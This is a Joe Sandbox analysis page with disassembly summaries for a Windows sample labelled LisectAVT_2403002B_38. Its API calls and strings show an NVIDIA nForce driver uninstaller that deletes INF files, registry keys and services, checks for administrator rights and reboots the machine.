                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$Device$Time_fputs$CallClassDebugFormatInstallerLocalMutexObjectOutputPropertyRegistryReleaseRemoveSelectedSingleStringWait__mbsicmp_l_fprintf_memset
                                  • String ID: After LeaveDriverStoreCache comparison.$Del {windir}\INF\OTHER\{InfFile}$Del {windir}\INF\{InfFile}$DelReg HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\Uninstall$DelReg HKLM\System\{*ControlSet}\{DriverBaseRegPath}\{DriverPath}$DriverPath$GetReg InfFile=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\InfPath$GetReg Provider=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\ProviderName$Install ITB Driver$LeaveDriverStoreCache$LeaveDriverStoreCache defined, leaving INFs.$Microsoft$Provider$RemoveDeviceStyle$UninstCommandClass::RemoveDeviceCallBack$Win95$Win98$Win9x$Yes
                                  • API String ID: 4216081165-2786948582
                                  • Opcode ID: 72c2f1619b11c8ba4319ca42973d496fd1f756b4d7114bf704437d102cf26e6f
                                  • Instruction ID: 8ec4b710010e4837ec26231cc4266aeb44bc9a34a6d4b71339fda3a8ed309083
                                  • Opcode Fuzzy Hash: 72c2f1619b11c8ba4319ca42973d496fd1f756b4d7114bf704437d102cf26e6f
                                  • Instruction Fuzzy Hash: 1551A8717443006BDA14EA318C53BAF7299AB88704F10083FB905B72C2EA7DF959869E
                                  Function 0040A450 Relevance: 38.7, APIs: 4, Strings: 18, Instructions: 217filewindowshutdownCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • DeleteFileA.KERNEL32(?), ref: 0040A4CB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000080,00000000), ref: 0040A58F
                                  • MessageBoxA.USER32(?,?,?,00040024), ref: 0040A6D3
                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040A6FD
                                    • Part of subcall function 00404870: PathIsDirectoryA.SHLWAPI(?), ref: 004048D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileTime_fputs$DebugDeleteDirectoryExitFormatLocalMessageModuleMutexNameObjectOutputPathReleaseSingleStringWaitWindows_fprintf
                                  • String ID: Deleting file [%s]$Deleting file [%s] at reboot requires a reboot$Delreg {NVUninst_RegKey}$DirAndApply {sysdir}\nvu*.exe,del {Current File}$ForceNoReboot$LeaveBinaries$Leaving binaries requires a reboot$Rebooting machine...$SeShutdownPrivilege$Silent$Two Reboot Required$UninstCommandClass::~UninstCommandClass$UninstallFiles$User chose not to reboot machine$Yes$delreg HKLM\Software\NVIDIA Corporation\NForce$set Current File$set UninstallFiles={sysdir}\*.nvu
                                  • API String ID: 307492909-1273085944
                                  • Opcode ID: e49483de95836ca44b6822e51834490a9c4d192393757eb05fefdd314fe7567a
                                  • Instruction ID: 148bd0133d11efb3d4cd8e13bec66975ac6c737cb57313e90b9bc31bda8e2d43
                                  • Opcode Fuzzy Hash: e49483de95836ca44b6822e51834490a9c4d192393757eb05fefdd314fe7567a
                                  • Instruction Fuzzy Hash: 047126707007406BC724AB258C12BAF3795AF85308F14443EFC4AAB3C2EB7D9949879E
                                  Function 004053F0 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 186memorythreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetVersionExA.KERNEL32(00000000), ref: 0040544C
                                  • ImpersonateSelf.ADVAPI32(00000002), ref: 004054A9
                                  • GetCurrentThread.KERNEL32 ref: 004054B6
                                  • OpenThreadToken.ADVAPI32(00000000), ref: 004054BD
                                  • GetLastError.KERNEL32 ref: 004054C7
                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 004054DE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004054E5
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040550D
                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 0040551F
                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00405535
                                  • GetLengthSid.ADVAPI32(?), ref: 00405547
                                  • LocalAlloc.KERNEL32(00000040,-00000010), ref: 00405555
                                  • InitializeAcl.ADVAPI32(00000000,-00000010,00000002), ref: 0040556C
                                  • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?), ref: 00405583
                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00405597
                                  • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000), ref: 004055A8
                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 004055B5
                                  • IsValidSecurityDescriptor.ADVAPI32(00000000), ref: 004055BC
                                  • AccessCheck.ADVAPI32(00000000,?,00000001,?,?,?,?,?), ref: 004055FD
                                  Strings
                                  • UninstCommandClass::NvHasAdminPrivileges, xrefs: 00405434
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DescriptorSecurity$InitializeLocal$AccessAllocCurrentOpenProcessThreadTimeToken_fputs$AllocateAllowedCheckDaclDebugErrorFormatGroupImpersonateLastLengthMutexObjectOutputOwnerReleaseSelfSingleStringValidVersionWait_fprintf
                                  • String ID: UninstCommandClass::NvHasAdminPrivileges
                                  • API String ID: 3955854268-666976295
                                  • Opcode ID: 050a9d4dc1d7ade114df343f63b4597a0cc6678a38cd6c5da925e3614281e811
                                  • Instruction ID: 4a8bf63e1e1cdc5abac39afea6264b0c60d7c4f639c268e0c17247689c844e3c
                                  • Opcode Fuzzy Hash: 050a9d4dc1d7ade114df343f63b4597a0cc6678a38cd6c5da925e3614281e811
                                  • Instruction Fuzzy Hash: 436163B1A40348AFEB20DFA4DC49FEF7B78EB48700F44852AF515A62C1D7799904CB69
                                  Function 0040A4B9 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 186filewindowshutdownCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileA.KERNEL32(?), ref: 0040A4CB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000080,00000000), ref: 0040A58F
                                    • Part of subcall function 00404870: PathIsDirectoryA.SHLWAPI(?), ref: 004048D3
                                  • MessageBoxA.USER32(?,?,?,00040024), ref: 0040A6D3
                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040A6FD
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileTime_fputs$DebugDeleteDirectoryExitFormatLocalMessageModuleMutexNameObjectOutputPathReleaseSingleStringWaitWindows_fprintf
                                  • String ID: Deleting file [%s] at reboot requires a reboot$Delreg {NVUninst_RegKey}$DirAndApply {sysdir}\nvu*.exe,del {Current File}$ForceNoReboot$LeaveBinaries$Leaving binaries requires a reboot$Rebooting machine...$SeShutdownPrivilege$Silent$Two Reboot Required$UninstallFiles$Yes$delreg HKLM\Software\NVIDIA Corporation\NForce$set Current File$set UninstallFiles={sysdir}\*.nvu
                                  • API String ID: 307492909-2329603694
                                  • Opcode ID: a27fceddfb19d90045bad796e34d44e3f8c07cd63adf6293f7ed7e5f8e49b961
                                  • Instruction ID: 155a2869753a8a445c7b2819d5c74154bf0e9286e24f00a05736786f3745b0ce
                                  • Opcode Fuzzy Hash: a27fceddfb19d90045bad796e34d44e3f8c07cd63adf6293f7ed7e5f8e49b961
                                  • Instruction Fuzzy Hash: 125105707407446BCA24AB218C12BAF33959F85308F14443EFD4A7B3C2EB7DA959879E
                                  Function 00409700 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 163fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040976F
                                  • _sprintf.LIBCMT ref: 004097B0
                                  • _sprintf.LIBCMT ref: 004097CB
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004097E0
                                  • _printf.LIBCMT ref: 004097FA
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  • FindClose.KERNEL32(00000000), ref: 0040992C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$FindTime_fputs$CloseDebugDirectoryFileFirstFormatLocalMutexObjectOutputReleaseSingleStringWaitWindows_fprintf_printf
                                  • String ID: %s\%s$%s\OEM*.inf$CheckFile: invalid number of arguments$ERROR: INVALID_HANDLE_VALUE for %s$FALSE$UninstCommandClass::NvFindNvInfFiles$\Inf
                                  • API String ID: 583740959-2594375003
                                  • Opcode ID: a574571de57ab7fca1c87d16c58b534211c262a308238dd06ed7cf8478f441f1
                                  • Instruction ID: 34d2659e362f0414488eca2dba3c1efc15551cc0cd9f7abfc6c9da0d0c97be85
                                  • Opcode Fuzzy Hash: a574571de57ab7fca1c87d16c58b534211c262a308238dd06ed7cf8478f441f1
                                  • Instruction Fuzzy Hash: CF5197B2114740ABC320E765CC85EEF73A8ABC9704F44493EF559922C1EB78A509C79E
                                  Function 004099CB Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 104fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DialogBoxParamA.USER32 ref: 004099CC
                                  • _memset.LIBCMT ref: 004099F4
                                  • _memset.LIBCMT ref: 00409A10
                                  • _memset.LIBCMT ref: 00409A2C
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00409A41
                                  • _swprintf.LIBCMT ref: 00409A61
                                    • Part of subcall function 0040C0CC: __vsprintf_s_l.LIBCMT ref: 0040C0DF
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00409A7C
                                  • _strcpy_s.LIBCMT ref: 00409A95
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00409ACE
                                  • _swprintf.LIBCMT ref: 00409AF2
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00409B07
                                  • _strcpy_s.LIBCMT ref: 00409B20
                                  Strings
                                  • %s\NVIDIA Corporation\Uninstall\nvdisp.nvu, xrefs: 00409AE0
                                  • RunOnce {sysdir}\nvdisp.nvu, xrefs: 00409A83
                                  • %s\nvdisp.nvu, xrefs: 00409A4F
                                  • Executing:%s, xrefs: 00409AA2, 00409B2D
                                  • RunOnce {ProgramFilesDir}\NVIDIA Corporation\Uninstall\nvdisp.nvu, xrefs: 00409B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _memset$FileFindFirstTime_fputs_strcpy_s_swprintf$DebugDialogDirectoryFolderFormatLocalMutexObjectOutputParamPathReleaseSingleStringSystemWait__vsprintf_s_l_fprintf
                                  • String ID: %s\NVIDIA Corporation\Uninstall\nvdisp.nvu$%s\nvdisp.nvu$Executing:%s$RunOnce {ProgramFilesDir}\NVIDIA Corporation\Uninstall\nvdisp.nvu$RunOnce {sysdir}\nvdisp.nvu
                                  • API String ID: 389241729-3951643655
                                  • Opcode ID: 1512cae453351450d9df7129ba3eeb8a0c5e4637a9a315dc2af4de555c9c77ee
                                  • Instruction ID: deeff6242d78a93a4980a5e5794772c45f318a232c0138feb4e407eb11fae31c
                                  • Opcode Fuzzy Hash: 1512cae453351450d9df7129ba3eeb8a0c5e4637a9a315dc2af4de555c9c77ee
                                  • Instruction Fuzzy Hash: F731ABB1548744ABD230E7D4CC86FEF7398ABC4715F44492EF25C951C1EBB8524887AE
                                  Function 00405680 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 115servicesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004056A6
                                  • SetLastError.KERNEL32(00000000), ref: 004056BB
                                  • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004056CC
                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 004056E4
                                  • Sleep.KERNEL32(00000064), ref: 0040570C
                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00405714
                                  • Sleep.KERNEL32(000003E8), ref: 0040572A
                                  • DeleteService.ADVAPI32(00000000), ref: 00405755
                                  • GetLastError.KERNEL32 ref: 0040575F
                                  • Sleep.KERNEL32(000003E8), ref: 00405775
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00405780
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00405787
                                  • GetLastError.KERNEL32 ref: 0040579A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 004057B0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Service$CloseErrorHandleLastSleep$OpenTime_fputs$ControlDebugDeleteFormatLocalManagerMutexObjectOutputQueryReleaseSingleStatusStringWait_fprintf
                                  • String ID: Error:$UninstCommandClass::UninstallService
                                  • API String ID: 3903441159-1355178088
                                  • Opcode ID: a37372994804237c97677104cca8dec83b1fabc7a210dcb473d58f23ee358677
                                  • Instruction ID: 84ba716b5870d943fc6418dcc241205f01b0433f286f4047e0984ca98f73e66c
                                  • Opcode Fuzzy Hash: a37372994804237c97677104cca8dec83b1fabc7a210dcb473d58f23ee358677
                                  • Instruction Fuzzy Hash: 2731C775200700EBD210AF25DC849AFBBA8EFD8355F00843EFA5593391D77889449FAA
                                  Function 00401720 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 59windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetLastError.KERNEL32 ref: 0040174D
                                  • _sprintf.LIBCMT ref: 00401767
                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00401785
                                  • _sprintf.LIBCMT ref: 0040179E
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                  • LocalFree.KERNEL32(?), ref: 004017AB
                                  • MessageBoxA.USER32(?,?,?,00000000), ref: 004017C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
